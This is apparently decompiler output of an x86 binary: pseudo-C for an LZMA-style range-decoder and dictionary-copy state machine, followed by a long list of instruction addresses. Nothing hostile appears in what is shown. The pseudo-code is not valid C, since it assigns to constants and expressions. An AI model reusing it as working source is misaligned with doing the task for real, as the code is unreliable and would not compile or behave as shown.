												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                  0x00000000
                                                  0x00406591
                                                  0x00406591
                                                  0x00406595
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x00406597
                                                  0x00406597
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
